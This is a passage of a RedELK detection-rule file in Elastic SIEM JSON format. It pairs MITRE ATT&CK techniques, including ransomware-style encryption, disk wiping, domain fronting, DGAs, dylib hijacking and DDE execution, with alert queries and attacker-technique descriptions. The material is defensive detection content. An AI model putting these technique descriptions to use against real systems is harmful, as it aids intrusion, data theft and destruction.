method.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1002","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1002] Data Compressed","query":"threat.technique.id: T1002","references":["https://attack.mitre.org/techniques/T1002","https://attack.mitre.org/techniques/T1560"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1002","name":"Data Compressed","id":"T1002"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.[1] [2] Some data encoding systems may also result in data compression, such as gzip.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1132","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1132] Data Encoding","query":"threat.technique.id: T1132","references":["https://attack.mitre.org/techniques/T1132"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1132","name":"Data Encoding","id":"T1132"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.[1][2][3][4] In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.[3]\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1486","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1486] Data Encrypted for Impact","query":"threat.technique.id: T1486","references":["https://attack.mitre.org/techniques/T1486"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1486","name":"Data Encrypted for Impact","id":"T1486"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1022","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1022] Data Encrypted","query":"threat.technique.id: T1022","references":["https://attack.mitre.org/techniques/T1022","https://attack.mitre.org/techniques/T1560"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1022","name":"Data Encrypted","id":"T1022"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1001","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1001] Data Obfuscation","query":"threat.technique.id: T1001","references":["https://attack.mitre.org/techniques/T1001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1001","name":"Data Obfuscation","id":"T1001"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Archive Collected Data. Interactive command shells may be used, and common functionality within cmd and bash may be used to copy data into a staging location.[1]\nIn cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may Create Cloud Instance and stage data in that instance.[2]\nAdversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1074","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1074] Data Staged","query":"threat.technique.id: T1074","references":["https://attack.mitre.org/techniques/T1074"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1074","name":"Data Staged","id":"T1074"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1030","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1030] Data Transfer Size Limits","query":"threat.technique.id: T1030","references":["https://attack.mitre.org/techniques/T1030"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1030","name":"Data Transfer Size Limits","id":"T1030"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may access data objects from improperly secured cloud storage.\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.[1][2][3]\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.[4][5][6] Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1530","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1530] Data from Cloud Storage Object","query":"threat.technique.id: T1530","references":["https://attack.mitre.org/techniques/T1530"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1530","name":"Data from Cloud Storage Object","id":"T1530"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.\nAdversaries may also collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications, as storage is one of the more fundamental requirements for cloud services and systems.\nThe following is a brief list of example information that may hold potential value to an adversary and may also be found on an information repository:\nPolicies, procedures, and standards\nPhysical / logical network diagrams\nSystem architecture diagrams\nTechnical system documentation\nTesting / development credentials\nWork / project schedules\nSource code snippets\nLinks to network shares and other internal resources\nInformation stored in a repository may vary based on the specific instance or environment. Specific common information repositories include Sharepoint, Confluence, and enterprise databases such as SQL Server.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1213","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1213] Data from Information Repositories","query":"threat.technique.id: T1213","references":["https://attack.mitre.org/techniques/T1213"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1213","name":"Data from Information Repositories","id":"T1213"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\nAdversaries may do this using a Command and Scripting Interpreter, such as cmd, which has functionality to interact with the file system to gather information. Some adversaries may also use Automated Collection on the local system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1005","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1005] Data from Local System","query":"threat.technique.id: T1005","references":["https://attack.mitre.org/techniques/T1005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1005","name":"Data from Local System","id":"T1005"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1039","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1039] Data from Network Shared Drive","query":"threat.technique.id: T1039","references":["https://attack.mitre.org/techniques/T1039"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1039","name":"Data from Network Shared Drive","id":"T1039"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search connected removable media on computers they have compromised to find files of interest. Sensitive data can be collected from any removable media (optical disk drive, USB memory, etc.) connected to the compromised system prior to Exfiltration. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.\nSome adversaries may also use Automated Collection on removable media.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1025","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1025] Data from Removable Media","query":"threat.technique.id: T1025","references":["https://attack.mitre.org/techniques/T1025"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1025","name":"Data from Removable Media","id":"T1025"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for Defacement include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1491","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1491] Defacement","query":"threat.technique.id: T1491","references":["https://attack.mitre.org/techniques/T1491"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1491","name":"Defacement","id":"T1491"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\nOne such example is use of certutil to decode a remote access tool portable executable file that has been hidden inside a certificate file. [1] Another example is using the Windows copy /b command to reassemble binary fragments into a malicious payload. [2]\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of User Execution. The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1140","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1140] Deobfuscate/Decode Files or Information","query":"threat.technique.id: T1140","references":["https://attack.mitre.org/techniques/T1140"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1140","name":"Deobfuscate/Decode Files or Information","id":"T1140"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1089","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1089] Disabling Security Tools","query":"threat.technique.id: T1089","references":["https://attack.mitre.org/techniques/T1089","https://attack.mitre.org/techniques/T1562/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1089","name":"Disabling Security Tools","id":"T1089"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.[1][2][3] Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.[2] Adversaries have been observed leveraging third-party drivers like RawDisk to directly access disk content.[1][2] This behavior is distinct from Data Destruction because sections of the disk are erased instead of individual files.\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1488","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1488] Disk Content Wipe","query":"threat.technique.id: T1488","references":["https://attack.mitre.org/techniques/T1488","https://attack.mitre.org/techniques/T1561/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1488","name":"Disk Content Wipe","id":"T1488"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources.\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.[1][2][3][4][5] The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. Disk Structure Wipe may be performed in isolation, or along with Disk Content Wipe if all sectors of a disk are wiped.\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[1][2][3][4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1487","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1487] Disk Structure Wipe","query":"threat.technique.id: T1487","references":["https://attack.mitre.org/techniques/T1487","https://attack.mitre.org/techniques/T1561/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1487","name":"Disk Structure Wipe","id":"T1487"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. [1] Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1172","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1172] Domain Fronting","query":"threat.technique.id: T1172","references":["https://attack.mitre.org/techniques/T1172","https://attack.mitre.org/techniques/T1090/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1172","name":"Domain Fronting","id":"T1172"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.[1][2][3]\nDGAs can take the form of apparently random or \"gibberish\" strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.[1][2][4][5]\nAdversaries may use DGAs for the purpose of Fallback Channels. When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.[4][6][7]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1483","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1483] Domain Generation Algorithms","query":"threat.technique.id: T1483","references":["https://attack.mitre.org/techniques/T1483","https://attack.mitre.org/techniques/T1568/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1483","name":"Domain Generation Algorithms","id":"T1483"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[1] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct SID-History Injection, Pass the Ticket, and Kerberoasting.[2][3] Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.[3] The Windows utility Nltest is known to be used by adversaries to enumerate domain trusts.[4]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1482","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1482] Domain Trust Discovery","query":"threat.technique.id: T1482","references":["https://attack.mitre.org/techniques/T1482"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1482","name":"Domain Trust Discovery","id":"T1482"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring Application Access Token.\nMultiple ways of delivering exploit code to a browser exist, including:\nA legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting.\nMalicious ads are paid for and served through legitimate ad providers.\nBuilt-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted attack is referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.[1]\nTypical drive-by compromise process:\nA user visits a website that is used to host the adversary controlled content.\nScripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version.\nThe user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\nUpon finding a vulnerable version, exploit code is delivered to the browser.\nIf exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\nIn some cases a second visit to the website after the initial scan is required before exploit code is delivered.\nUnlike Exploit Public-Facing Application, the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to Steal Application Access Tokens, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1189","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1189] Drive-by Compromise","query":"threat.technique.id: T1189","references":["https://attack.mitre.org/techniques/T1189"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1189","name":"Drive-by Compromise","id":"T1189"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths.\nA common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. [1] [2]\nIf the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1157","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1157] Dylib Hijacking","query":"threat.technique.id: T1157","references":["https://attack.mitre.org/techniques/T1157","https://attack.mitre.org/techniques/T1574/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1157","name":"Dylib Hijacking","id":"T1157"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1157","name":"Dylib Hijacking","id":"T1157"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. [1] [2] [3]\nMicrosoft Office documents can be poisoned with DDE commands [4] [5], directly or through embedded files [6], and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. [7] DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1173","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1173] Dynamic Data Exchange","query":"threat.technique.id: T1173","references":["https://attack.mitre.org/techniques/T1173","https://attack.mitre.org/techniques/T1559/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1173","name":"Dynamic Data 